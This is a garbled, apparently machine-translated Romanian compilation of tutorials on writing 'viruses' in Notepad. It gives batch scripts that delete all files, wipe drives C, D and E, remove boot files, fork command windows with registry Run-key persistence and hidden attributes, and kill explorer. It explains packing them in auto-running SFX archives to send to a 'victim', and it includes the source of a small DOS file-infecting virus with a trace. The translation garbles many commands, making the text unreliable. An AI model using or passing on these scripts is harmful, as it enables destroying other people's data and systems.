Vă rog să nu credeți că numai autorii de viruși au nevoie de cunoștințe despre modul în care sunt scrise virușii! În scopul securității computerelor, acestea nu sunt mai puțin importante pentru utilizatorii obișnuiți. Chiar și o înțelegere superficială a modului de scriere a virușilor într-un notebook vă va ajuta să vă protejați computerul de multe probleme.

Așa arată un virus, tastat într-un bloc de notă obișnuit, care face parte din orice sistem de la Microsoft Windows. Rețineți însă că este dificil să-l numiți virus, doar comenzi de sistem, acestea sunt salvate în format .bat. Pentru a modifica extensiile, trebuie să configurați sistemul:

  • Deschidem " Un calculator«
  • Mergem sus în meniu " Serviciu"Dacă nu este vizibil, apăsați ALT
  • În acest meniu, accesați „ Serviciu„Selectați elementul” Setări dosare«
  • Mergem la fila " Vedere„Și căutați articolul” Ascundeți extensiile pentru tipurile de fișiere înregistrate«
  • Îndepărtăm bifați acest articol.

La prima vedere, este în regulă - doar câteva cuvinte scurte de comandă. Dar, de fapt, dacă puneți acest fișier în folderul de sistem " system32 \\ drivers \\ etc„Și scrieți-l la pornire astfel încât să înceapă când sistemul pornește, apoi, după repornirea computerului, va fi imposibil să deschideți orice program sau să selectați o altă acțiune pe desktop. Nu este recomandat să repetați acești pași dacă nu aveți abilitățile de a lucra cu registrul de sistem!

În loc de telnetdrive.bat, încercați să utilizați comenzi sigure pentru a lansa: Calc (calculator), Taskmgr (manager de sarcini) sau Mspaint (programe de vopsire)

Unde sa încep

Este timpul să studiați o mică instrucțiune generală pentru „realizarea” unor astfel de fișiere.

  • În primul rând, deschidem caietul;
  • Intrăm comenzile acolo, adică creăm un „corp” al virusului în el;
  • Ne salvăm munca Fișier -\u003e Salvare ca;
  • Acum rămâne să modificați extensia de fișier . txt pe . băţ și, în locul numelui salvat, introduceți cel care va fi folosit.

Un virus simplu este scris și salvat într-un fișier. Acum ar fi frumos să aflăm ce a fost scris în corpul virusului salvat în fișier.

Începem să înțelegem în ordine de la prima linie:

  1. @ Ecouoprit - fără această comandă, tot ceea ce este scris ar fi afișat pe ecranul monitorului.
  2. Data11.14 - indică data creării.
  3. Dacăexistac:cer.băţmergi laabc - verificarea existenței fișierului sky.bat pe discul C și dacă acesta nu există
  4. Copiați% 0 c: sky.bat - se replică schimbând numele de fișier original în sky.bat
  5. Atribuie +hc:cer.băţ - ascunde fișierul creat de ochii curioși.
  6. Ecouc:cer.liliac \u003e\u003eautoexec.băţ - virusul este adăugat la pornire.
  7. : abc - dacă există unul, execuția programului va merge aici.
  1. mdCRECK - creează folderul necesar sau inutil, în funcție de scopul creatorului de viruși.
  2. mdNOU - astfel de foldere pot umple întregul hard disk al utilizatorului.
  3. EtichetaE:LUZER - scrie numele unității logice E. În acest caz, LUZER.
  4. conf. univ.exe \u003d.mp3 - extensia .exe va fi asociată ca .mp
  5. del c: Fișiere de program / q - tot ce se afla în folderul Program Files va fi șters.
  6. del *. * / q - totul va fi șters din directorul în care se află virusul, cu excepția folderului cu virusul în sine.

Ne-am distrat suficient, să ne gândim la lege:

  1. del% 0 - virusul va face lucruri și se va șterge singur.

Ultimul lucru rămas este să aflăm cum o ascund. Pur şi simplu! Reformatați fișierul din extensia .bat în .exe utilizând arhivatorul WinRAR. Când creați o arhivă, marcați - „Creați arhivă SFX” și setați caseta de selectare „Executare după despachetare”. Bineînțeles, ele indică numele real sub care a fost creat virusul.

DISCLAIMER

Acest articol este scris în scopuri educaționale, iar autorul nu este responsabil pentru acțiunile dvs. Fii discret și apreciază munca altora.

Cum sunt create virușii de computer | Un pic de teorie

Virușii informatici - un tip de software rău intenționat care poate crea copii de la sine și poate fi încorporat în codul altor programe, zone de memorie de sistem, sectoare de boot și, de asemenea, poate distribui copii de la sine prin diferite canale de comunicare.

Virușii informatici au următoarele clasificări:

  • Porniți viruși - virușii care pătrund în sectorul de boot al dispozitivelor de stocare a datelor, precum hard disk-uri, unități flash, dischete etc. și pot perturba accesibilitatea fișierelor.
  • Înregistrați viruși - tipul de viruși care sunt încorporați în fișiere executabile (fișiere cu extensiile COM și EXE) și afectează negativ funcționalitatea acestora.
  • Înregistrați viruși de pornire - viruși care combină funcțiile celor două tipuri anterioare de viruși;
  • Documentați virușii - un tip de viruși care infectează fișierele sistemelor de birou. Acest tip se mai numește „viruși macro”, deoarece sistemul este infectat prin infectarea macrourilor programului.
  • Viruși de rețea - tipul de viruși care se răspândesc prin utilizarea unei rețele de calculatoare, adică servicii de rețea și protocoale.

Cel mai faimos virus din lume s-a numit ILOVEYOU. În esență, era complet inofensiv, un vierme care spama poșta oamenilor. Cu toate acestea, lumea a fost expusă recent atacurilor cibernetice care i-au făcut pe toți să se gândească la siguranța lor. Virusul WannaCry a infectat multe computere și a cerut o răscumpărare de 300 de dolari în bitcoin. Cu toate acestea, unii analiști consideră că acesta a fost doar un test și că va exista un alt atac la o scară mult mai mare și va fi îndreptat către utilizatorii Apple.

Și totuși, deși WannaCry a fost răspândit și a obținut o mulțime de bani din acesta, era un WinLocker obișnuit care putea fi eliminat. Faptul este că au plătit în majoritatea băncilor și companiilor care nu au avut timp să-și dea seama, iar 300 de dolari pentru ei nu reprezintă o pierdere gravă.

Creăm viruși comici și multe altele

Să creăm câteva dintre propriile noastre viruși, pe care nu le recomand să le verific pe computer, deoarece se poate termina foarte prost.

Absolut toată lumea poate produce astfel de viruși, deoarece nu avem nevoie de software specializat etc., avem nevoie doar de un notebook.

Trebuie să spun imediat că fișierul nostru va fi salvat în aproape toate cazurile, vom fi în format .bat, scriu numele anyname, dar puteți da absolut orice.

Ștergeți toate fișierele

Salvăm acest cod ca anyname.bat și gata, după ce începeți tot conținutul va fi șters.

Ecranul albastru al morții

@echo off del% systemdrive% *. * / f / s / q shutdown -r -f -t 00

Salvăm acest cod în fișierul anyname.vbs, vă rugăm să rețineți că formatul de fișier aici trebuie să fie .vbs, nu .bat.

Formatați unitățile C, D, E în trei secunde

rd / s / q D:
rd / s / q C:
rd / s / q E:

Salvați acest fișier ca anyname.bat și rulați-l. Toate unitățile vor fi formatate în trei secunde.

Efectul Matrix | Efect Matrix

@echo off
culoarea 02: trucuri
echo% random %% random %% random %% random %% random %% random %% random %% random%
trece la trucuri

Salvați-l ca anyname.bat și rulați-l, nu este periculos pentru computer.

Opriți computerul și dezactivați capacitatea de repornire

@echo off attrib -r -s -hc: autoexec.bat del c: autoexec.bat attrib -r -s -hc: boot.ini del c: boot.ini attrib -r -s -hc: tldr del c: tdlr attrib -r -s -hc: windowswin.ini del c: windowswn.ini @echo off Msg * V-AȚI INFECTAT! Shutdown -s -t 7 -c "Un virus preia c: Drive

Salvați-l ca kind.bat, ESTE PERICULOS să RULAȚI PE PC-ul Dvs.!

Înlocuim fișierele cu cele care nu funcționează

Acest virus va înlocui următoarele formate (.exe .jpeg .png .mpeg .sys)

@echo off assoc .txt \u003d jpegfile

Salvați ca orice nume.bat și rulați.

Eliminarea sistemului de operare

@echo off Del C: *. * | y

Salvați-l ca anyname.bat și rulați-l pe computerul victimei.

Și asta e tot pentru astăzi, mulțumesc că ai citit articolul și sper că nu vei abuza de informațiile primite. Dacă doriți mai mulți viruși, atunci scrieți în comentarii, o vom face! Salvați articolul pe rețelele dvs. sociale pentru a nu-l pierde.

Noroc în viață și ne vedem!

"Conducea undeva într-un pachet rigid incomod pentru o lungă perioadă de timp, tremura și se legăna, corpul îi cerea hrană. Nu înțelegea de ce el, care tocmai se născuse, a fost dat afară din casă ... În cele din urmă, tremurul s-a oprit, iar cineva era un străin. și a deschis aproximativ arhiva atașată la scrisoare. Un virus tânăr și curios s-a aplecat și a făcut prima divizie ... "

În acest articol, voi împărtăși experiența mea cu scrierea de viruși. Principiul de bază al oricărui virus poate fi rezumat în câteva cuvinte: corpul unui virus în timpul execuției sale este interpretat ca un cod, iar în timpul infecției, ca date. Există multe tipuri de viruși și diferite metode de infecție. Bineînțeles, chiar mecanismul de acțiune al virusului depinde de sistemul de operare specific. Există, de exemplu, viruși care funcționează în modul protejat al procesorului (maxim
privilegii și adresarea absolută a tuturor memoriei). Companiile precum AVP folosesc foarte mult timp și resurse pentru a trata aceste instanțe. Singurul lucru care salvează creatorii de antivirus este un număr foarte mic de viruși cu adevărat profesioniști.

Pentru a învăța cum să scrieți viruși, trebuie doar să cunoașteți elementele de bază ale asamblatorului. Adică, cu cunoștințe inițiale, puteți încerca să vă scrieți propriile virusuri și să le investigați pe cele existente. Alte utile și uneori necesare
cunoașterea va veni pe măsură ce studiați creațiile altora. Din resurse pe acest subiect, vă pot recomanda o pagină care conține un număr mare de cărți și articole:
http://vx.netlux.org/lib_rus.shtml.
Toate documentele ei sunt scrise într-un mod foarte ușor de înțeles și accesibil
limba. Există, de asemenea, o cunoscută revistă electronică Infected Voice. Are un sistem de navigare convenabil, care vă permite să navigați în materiale noi (surse și articole). Această revistă este publicată la fiecare jumătate de an (cel puțin așa era înainte, nu sunt sigur acum) și conține toate inovațiile în acest domeniu.

Să presupunem că ați găsit sursa unui virus și doriți să îl investigați. Cum să o facă? Sincer să fiu, este prima dată când întâmpin eu o astfel de problemă. Întrebarea mea a devenit așa: există un text de virus, vreau să văd cum funcționează și, în același timp, Îmi este frică de IT! Acest lucru este complet real: ce va împiedica acest virus să îmi ardă CMOS-ul sau să-mi frece șurubul? Răspuns: nimic. Cu acțiunile greșite, virusul vă poate provoca răul pe care este programat să îl facă. Cu toate acestea, algoritmul pentru acțiuni corecte este destul de simplu. Acum ne vom da seama.

Vom presupune că sursa virusului este scrisă în limbaj de asamblare. Acest limbaj este ideal pentru scrierea de viruși. După cum știți, în
în asamblor există doar două comenzi care numesc „real” (adică acțiuni care pot produce
modificări ireversibile pe hard disk sau în altă parte) acestea sunt „INT” și „OUT”, toate celelalte comenzi funcționează cu registre și steaguri ale procesorului (deși destul de grosolane, dar în general corecte). Nu luăm în considerare funcțiile API WIN, deoarece, în principiu, acestea pot fi considerate un înlocuitor pentru întreruperile DOS, iar apelul lor este un înlocuitor pentru comandă
„INT”.

Un pic de ajutor pentru începători sau pentru cei care nu au scris în ACM de mult timp: comanda „INT” este utilizată pentru a apela întreruperile DOS sau BIOS, iar comanda „OUT” este utilizată pentru a scrie date în port. În acest caz, pentru comanda „INT”, numărul funcției este indicat în registrul AH (cel mai adesea) și
pentru comanda „OUT”, registrele AL, AX, EAX stochează datele scrise în port.

Asa de. Luați orice depanator. De la început trebuie să înțelegeți virușii sub DOS (aceștia încă funcționează sub
Win), atunci orice depanator va funcționa: Turbo Debugger de la Borland Inc., CodeView de la MicroSoft, AFDPRO sau AVPUTIL. Apoi, încărcați sursa în depanator și urmăriți pas cu pas. Principalul lucru este să respectați DOAR O REGULĂ. Poate fi numit auriu.
ATENȚIE: puteți executa în siguranță codul sursă al virusului dvs., dar imediat ce ajungeți la comenzile „OUT” sau „INT”, opriți imediat și începeți analiza.

Trebuie să analizați:

  • numărul portului de înregistrare sau de întrerupere apelat;
  • numărul funcției sau datelor apelate scrise în port.

Pentru a înțelege acțiunile reale ale acestor comenzi, utilizați fie Ajutor tehnic, fie orice andocare de pe ASM sau oricare altul
carte. Principalul lucru este că în sursa dvs. puteți găsi informații despre toate întreruperile și porturile.
Deci, vă puteți da seama ce va face
următoarea comandă fără a o rula pe computer. În timpul urmăririi, scrieți toate datele (starea registrelor, adresele de comandă, datele pe
numite funcții etc.) pe o bucată de hârtie. Apoi, până când funcția este apelată (sau scrisă în port), veți fi complet înarmați și puteți determina ce se va întâmpla dacă rulați următoarea comandă. De asemenea, vă va ajuta cu analiza comparativă a modificărilor din registre și steaguri.

După ce înțelegeți ce face această comandă ("INT" sau "OUT"), săriți-o și continuați până la
sfârșitul fișierului sau următoarea comandă. Drept urmare, veți sorta orice virus pe rafturi și veți înțelege funcționarea acestuia.

Să vedem un exemplu. Pe măsură ce am luat un mic virus scris de un anumit Memento, l-am luat din numărul unsprezecelea al Vocii infectate. A fost acolo fără comentarii, așa că a trebuit să facă toată munca singur. Ce eu
atrase în această creație: cod sursă foarte mic, dimensiune foarte mică a executabilului compilat, algoritm de neînțeles (la prima vedere). Iată codul său sursă (apropo, se numește REM22):

Model minuscul
.cod
.lansare
start:
pop cx
hel:
xchg topor, bx
db 108h shr 1
db 4eh; dec si
db 9eh shr 1
db 3ch; cmp al, xx
db 100h shr 1
db 40h
fmask db "*. *", 0
lodsw
cwd
mov dl, al
shl dx, 1
int 21h
jmp hel
Sfârșit

În opinia mea, acest virus este o capodoperă, deoarece cu o dimensiune atât de mică
organizarea unui mecanism de reproducere este o operă de geniu. Când analizăm acum ce și cum face el, totul
va cădea la locul său. Între timp, trebuie remarcat: în principiu, acest virus nu efectuează nicio acțiune distructivă (cred că reproducerea nu poate fi considerată ca atare), ci infectează toate fișierele
în același director. Nu este un virus „profesional”, adică îi lipsesc multe dintre mecanismele caracteristice creațiilor serioase:

  • nu există un mecanism „prieten / dușman” (virusul infectează pe toată lumea fără discriminare, chiar și pe el însuși sau obiecte deja infectate);
  • infecția are loc numai fișiere din același director (încercați să o compilați și să o rulați într-un folder în afara acestuia
    nu este nimeni :));
  • virusul nu este polimorf (nu se criptează singur sau nu își modifică codul);
  • virusul nu efectuează acțiuni distructive;
  • virusul nu este rezident în memorie.

Să aruncăm o privire în interiorul nostru
suprasolicitare. Sursa este un model pentru crearea unui fișier exe. „.startup” este o directivă TASM „și, puteți face fără ea, dar atunci trebuie să scrieți„ org 100h ”, apoi să puneți eticheta (și
la final, după „sfârșit”, puneți numele etichetei). Restul comenzilor pot fi găsite fără probleme în nicio carte și vedeți ce fac (nu fiți leneși). Rămâne doar să ne dăm seama ce fac aceste echipe împreună în ansamblu.

Această capodoperă este un ciclu obișnuit care se repetă de 6 ori. Ce se întâmplă în buclă? Ceea ce se întâmplă este că numim int 21h cu șase funcții diferite (93, 4E, 3C, 40, 2E, 00). Ne uitam
în ordine înseamnă:

„pop cx” este doar pentru zeroing cx (în partea de sus a stivei, după cum știți, la începutul programului există zero). Pentru ce? Și astfel încât la comanda SUB CH, (uite, ar trebui să fie la offset 108h în debugger) pentru a obține CH \u003d 01 (la offset 2Ah (acesta este undeva în PSP), FFh minte întotdeauna), adică nu trebuie să te arăți și să scrii doar sub ch, ffh, dar acest lucru va schimba codul programului ... Se pare:
*. *, 0 \u003d sub CH ,, și aceasta este o mască gata făcută pentru căutare ... AICI ESTE GENIUL !!!

Adică, sub ch, ffh este "Ae" (în coduri ASCII cu un spațiu la sfârșit). Mai mult, tot ce merge de la offset 101 (cod 93) la offset 10B (cod 00) este FUNCȚII PENTRU int 21h !!! Acestea. acestea sunt 6 funcții pe care le numim pe rând în buclă (vezi numerele lor de mai sus), iar codul obținut este doar beteală. Aceasta nu are ABSOLUT NICI UN SENS! A FOST AȘA CÂND SE ADUNĂ FUNCȚIILE DIN CONTRACT. Adică, dacă scriu TANAT, se va traduce într-o succesiune de câteva comenzi, nu? Dar acestea sunt în esență date ... deși în acest program nu se poate numi date, este doar FUNCȚII pentru int 21h, asta este ceea ce
GENIU!!! Nu are sens să spunem mai departe - deoarece în fiecare dintre cele șase cicluri se numește o funcție, ei bine, toate registrele sunt aproximativ
adaptat la idealuri ... Uite:

Pentru prima dată funcția 93h se numește: Pipe (Eroare) - pentru programul în sine NU EFECTUĂ NICI O ÎNCĂRCARE, NU FĂ CE ESTE INUTIL, ESTE DOAR EXCES, NU ESTE NECESAR, ACEST ESTE UN CICL EXTRA, DAR ȚINÂND ÎN CONTAȚIE geniul codului, VINE doar NU POATE VENI DE LA EL !!! Va mai exista o astfel de funcție „stânga” - vezi mai jos.

Al doilea: 4Eh - de asta ai nevoie! Căutați un fișier, iar în momentul apelului, offset-ul de mască de fișier (108h) este în dx !!!

În al treilea rând: 3Ch - crearea fișierului. Aceasta este o altă funcție „stânga”. Nu avem nevoie de ea. Nu este nevoie să creăm un fișier (la urma urmei, trebuie doar să ne scriem singuri în fișierul pe care l-am găsit în pasul anterior). În DX există un fel de gunoi rămas, desigur cu
numele fișierului nu are nimic de făcut, deci CF \u003d 1 și mergem la următoarea buclă.

Al patrulea: 40h - Scrierea în dosar. Dar de asta avem nevoie deja! DX conține un offset de 100h (adică începutul REM22), dar CX a eșuat puțin - este egal cu 400h, adică de fapt la începutul fișierului găsit
Se vor scrie 400 de octeți, în timp ce REM22 ia doar 22 de octeți, adică Se vor scrie 1002 octeți suplimentari. Asta este adevărat. Dar, având în vedere geniul codului :), acesta poate fi iertat.

Al cincilea: 2Eh - Setați Verificare semnalizare Aceasta este funcția STÂNGA, aici este pur și simplu - apendicele programului.

A șasea: 00h - aceasta se dovedește a fi o ieșire din program (nici eu nu știam).

Atât: adică avem 6 cicluri, dintre care doar 3 sunt semnificative: căutare, înregistrare și ieșire.
Cel mai probabil nu vei fi
Poyantno. Pentru a-l da seama, încărcați sursa în depanator, urmăriți-o, uitați-vă
privind datele de stare din registre, uitați-vă la comentariile mele. Atunci totul va deveni clar. In cele din urma
Ofer un tabel de depanare, astfel încât să nu îl compilați singur (pentru un singur lucru și să vedeți cum ar trebui să arate). În principiu, ar trebui să fie suficient,
pentru a înțelege ce se întâmplă în acest virus, dar cred că comentariile vor fi utile.

ADR COD AȘM 1 2 3 4 5 6
100 59 POP CX CX \u003d 0 - - - - -
101 93 XCHG AX, BX AX \u003d BX \u003d 0 AX \u003d 0, BX \u003d 9300h AX \u003d 9300h, BX \u003d 0 AX \u003d 0, BX \u003d 0005h AX \u003d 0005h, BX \u003d 0400h AX \u003d 0400h, BX \u003d 2E00h
102 84 4E 4F TEST B + 4Fh,
CL
- - - - - -
105 3C 80 CMP AL,
80h
- - - - - -
107 40 INC AX AX \u003d 0001h AX \u003d 0001h AX \u003d 9301h AX \u003d 0001h AX \u003d 0006h AX \u003d 0401h
108 2A 2E 2A 00 SUB CH, B CX \u003d 0100h CX \u003d 0200h CX \u003d 0300h CX \u003d 0400h CX \u003d 0500h CX \u003d 0600h
10C ANUNȚ LODSW (DS: SI-\u003e AX) AX \u003d DS:
100 \u003d 9359h
AX \u003d DS:
102 \u003d 4E84h
AX \u003d DS:
104 \u003d 3C4Fh
AX \u003d DS:
106 \u003d 4080h
AX \u003d DS:
108 \u003d 2E2Ah
AX \u003d DS:
10A \u003d 002Ah
10D 99 CWD (DX \u003d E (AX)) DX \u003d FFFFh DX \u003d 0000h DX \u003d 0000h DX \u003d 0000h DX \u003d 0000h DX \u003d 0000h
10E 8A D0 MOV DL, AL DX \u003d FF59h DX \u003d 0084h DX \u003d 004Fh DX \u003d 0080h DX \u003d 002Ah DX \u003d 002Ah
110 D1 E2 SHL DX, 1 DX \u003d FEB2h DX \u003d 0108h DX \u003d 009Eh DX \u003d 0100h DX \u003d 0054h DX \u003d 0054h
112 CD 21 INT 21h AH \u003d 93 (Pipe) - Eroare AH \u003d 4E
(FindFirst)
AH \u003d 3C (CreateFile) AH \u003d 40 (WriteFile) AH \u003d 2E (SetVerifyFlag) AH \u003d 00 (Terminați)
114 EB EB JMP SHORT 101 ??? - - - ??? -

Destul de ciudat, dar informațiile despre cum se creează un virus sunt de interes nu numai pentru genii de calculatoare și programatori inteligenți, ci și pentru utilizatorii obișnuiți ai unui computer personal. Uneori, oamenii răzbunători sunt dispuși de bunăvoie să facă rău victimei prin crearea de software rău intenționat, dar cel mai adesea, aceasta este doar o farsă cibernetică. Orice pătrundere într-un computer de către terți sau vătămarea deliberată a software-ului este pedepsită de legislația multor țări. Acest articol despre cum să creați un virus poate fi folosit numai pentru a face utilizatorul să înțeleagă modul în care sunt utilizate comenzile Windows NT.

Crearea unui virus

Orice utilizator de computer novice își poate crea propriul virus de computer. Nu este deloc necesar să ai cunoștințe în domeniul programării pentru acest lucru. Este suficient să aveți o dorință, puțin timp liber pentru a înțelege cele mai simple comenzi și, bineînțeles, un computer. Acest articol vă va învăța cum să creați un virus în Notepad. În acest caz, vom lucra fără diverși interpreți, codul nu va fi plasat în medii de dezvoltare specializate. Care este esența acestei metode? Programul nostru (virus) va fi executat prin conversia unui fișier text într-un fișier batch Windows cu extensia (* .bat). După pornire, toate evenimentele pe care le specificați în fișierul executabil vor fi executate. Acum știi teoretic cum să creezi un virus, apoi poți trece la un studiu mai detaliat al acestui subiect. Vreau să vă avertizez că aceste virusuri nu sunt destinate lucrurilor serioase. Deși pot dăuna computerului, amploarea tragediei este mică. Nu veți putea fura informații de la victimă, cu atât mai puțin urmăriți-o. Acum este momentul să vă arăt cum să creați un virus. Pentru a face acest lucru, vă sfătuiesc să învățați cum să utilizați comenzile de gestionare Windows NT, dintre care unele vor fi descrise mai jos. Deschideți un editor de text obișnuit și tastați următoarea comandă: @echo off.

Felicitări, ați dezactivat ecranul de progres. Acum, după lansarea virusului, victima nu va ști despre progresul codului rău intenționat, deoarece întregul proces va fi ascuns ochilor ei. Apoi, pe o nouă linie, tastați următorul cod:% SystemRoot% / system32 / rundll32 user32, SwapMouseButton\u003e nul.

Nu are sens să explicăm fiecare comandă, dar esența ei este că acum butoanele mouse-ului sunt programate în ordine inversă (atribuirea butoanelor a fost inversată). Acum salvați acest fișier și modificați extensia acestuia (înlocuiți * .txt cu * .bat). Acesta este un fișier batch Windows care va face ca mouse-ul să funcționeze defectuos după lansare. Aveți un bun exemplu despre cum să creați un virus și, dacă sunteți interesat, puteți continua să studiați aceste tipuri de comenzi și să vă adânciți în această nișă. Dacă doriți să vă speriați grav victima, puteți adăuga linii de genul acesta:

taskkill / f / im explorer.exe\u003e \u200b\u200bnul
shutdown -r -t 1 -c "lol" -f\u003e nul

Prima linie pe care o dezactivați procesul "explorer.exe", iar următoarea - reporniți computerul. Sarcina dvs. este să adăugați noi comenzi la virusul dvs. dintr-o nouă linie, apoi salvați fișierul și modificați extensia acestuia. Ești aproape un hacker. Acum să prezentăm acest dosar victimei. Trebuie să plasați fișierul creat cu extensia bat într-o arhivă SFX specială, după ce ați selectat elementul „Rulați după despachetare”. Acum computerul victimei va fi infectat automat cu acest virus după deschiderea arhivei. Rămâne doar să trimitem „cadoul” nostru.

Totul este deja inventat

Dar de ce să reinventăm roata dacă programatorii și hackerii experimentați ne-au simplificat mult viața? În domeniul public, puteți găsi cu ușurință un program numit "Generator de viruși" Kuzya ". Nu va trebui să scrieți manual toate comenzile. Trebuie doar să selectați acțiunea dorită, iar programul va crea în mod independent acest fișier rău intenționat pentru dvs.

Crearea celor mai simple viruși nu necesită medii speciale de dezvoltare. Și, de altfel, și cunoștințe speciale. Este destul de ușor să creați viruși utilizând linia de comandă. Pentru a face acest lucru, trebuie să cunoașteți o mică sintaxă a liniei de comandă și să puteți crea fișiere .bat.

Ce este un fișier .bat și cum îl creez?

La un nivel foarte superficial, acestea sunt fișiere cu extensia .bat. Aceste fișiere conțin comenzi care trebuie executate de interpretul de comenzi Windows. Toate acele comenzi care pot fi executate în fereastra liniei de comandă pot fi introduse în fișierul .bat și rulate. Rezultatul va fi același.

Pentru a crea un virus .bat, avem nevoie de un editor de text obișnuit. În mod ideal, Notepad este potrivit pentru acest scop. După ce ați creat și deschis un nou document text, trebuie să introduceți codul (comenzile) pe care ar trebui să le execute acolo. După aceea, trebuie să utilizați meniul Salvează casalvați acest fișier oferindu-i un anumit nume cu extensia .băţ și specificarea tipului de fișier Toate filele.

Creăm cel mai simplu virus

În acest articol, vom analiza crearea unui virus care, după lansarea acestuia, va deschide o fereastră de prompt de comandă la nesfârșit. Ferestrele de linie de comandă care se deschid infinit și foarte rapid nu îi vor permite utilizatorului să lucreze calm. Nimeni nu va avea timp să le închidă pe toate și foarte curând vor înfunda memoria computerului, care la rândul său va încetini considerabil computerul, până la înghețarea completă. Va arăta cam așa:

În plus, vom arunca virusul la pornire, ceea ce va asigura că virusul pornește automat împreună cu sistemul de operare.

Codul virusului creat

Câți programatori, atâtea soluții diferite pot fi gândite pentru fiecare sarcină. Voi da una dintre metodele mele pentru rezolvarea unei astfel de probleme.

md c: \\ papka
echo start c: \\ papka \\ virus.bat\u003e c: \\ papka \\ virus.bat
reg add HKCU \\ Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Run / v virus / d c: \\ papka \\ virus.bat
attrib + r + h + s c: \\ papka
attrib + r + h + s c: \\ papka \\ virus.bat
începe c: \\ papka \\ virus.bat
del% 0

Acum să aruncăm o privire asupra codului în sine. Prima linie creează un folder numit papka la rădăcina discului C: /... Această adresă este doar de exemplu. Utilizarea rădăcinii folderului C: / nu este o opțiune bună pentru un virus. Dacă doriți să asigurați o bună supraviețuire a virusului, cel mai bine este să îl ascundeți. Puteți chiar sări peste prima comandă dacă scăpați virusul în directorul deja creat.

A doua linie creează fișierul c: \\ papka \\ virus.bat și, folosind comanda echo, scrie comanda în ea începe c: \\ papka \\ virus.bat... Aici trebuie să știți că după semnul\u003e este indicat locul ieșirii comenzii date. Aici trebuie să faceți cunoștință: c: \\ papka \\ virus.batși există principalul corp al virusului. Fișierul .bat pe care l-am creat cu codul, pe care îl analizăm acum, este doar instalatorul principalului nostru virus. Puteți utiliza un alt nume și o altă locație pentru virus.

A treia linie aruncă corpul virusului pe care l-am creat în a doua linie la pornire. Pentru aceasta, este utilizată ramura de registru a utilizatorilor, deoarece utilizatorul are întotdeauna acces la ea. Dar nu este sigur să utilizați pornirea computerului, deoarece este posibil ca utilizatorul să nu aibă acces administrativ, ceea ce va cauza o eroare inutilă.

A patra și a cincea linie de cod modifică atributele virusului și folderul în care este stocat virusul. Cu aceste comenzi, și pentru aceasta este utilizată, adăugăm atribute Numai citire, ascuns și sistemic atât pentru dosar, cât și pentru virus. Utilizarea atributelor r (numai citire) nu este necesar. Și iată atributele Ascuns și sistemic va proteja bine virusul pe care l-am creat. Dacă nu mă credeți, atunci citiți articolul despre virusul respectiv. El folosește exact această tehnologie.

A șasea linie de cod lansează virusul nostru. Puteți sări peste acest element dacă doriți ca virusul să înceapă pentru prima dată numai după repornirea computerului.

Și, în cele din urmă, ultima, a 7-a linie elimină acest virus .bat. Acest lucru este util, deoarece folosind acest fișier .bat, puteți accesa în siguranță virusul pe care l-am creat și îl puteți elimina.

Semnificația virusului creat

Semnificația unui virus care se încadrează în aceste 7 linii este de a crea virusul principal, de a-l proteja și de a asigura funcționarea sa constantă. Și, de asemenea, măturați-vă urmele. Ce face principalul virus? După pornirea virusului principal, acesta execută comanda care este scrisă în el. Și această comandă, la rândul său, lansează virusul nostru, care se lansează din nou. Și așa mai departe ad infinitum.

Cum să faceți față unor astfel de viruși?

În primul rând, începutul luptei împotriva acestui virus va începe după ce începe. Foarte curând virusul va umple memoria RAM cu copiile sale și nici măcar nu veți putea muta mouse-ul. Prin urmare, un astfel de spectacol trebuie oprit imediat. Butonul Break de pe tastatură este perfect pentru aceasta. Apăsați-l cât este necesar pentru a nu mai crea copii noi. Pe tastaturi fără buton Break, Ctrl + C vă poate ajuta.

Cum se elimină un astfel de virus?

Puteți trece prin intrarea sa în startup (pentru mai multe detalii consultați linkul). Și, de asemenea, puteți ieși la virus prin comandă, care va fi afișată în fereastra de interpretare a comenzilor. Bineînțeles, dacă puteți ajunge la fișierul ascuns și sistem. Așa se creează un virus simplu.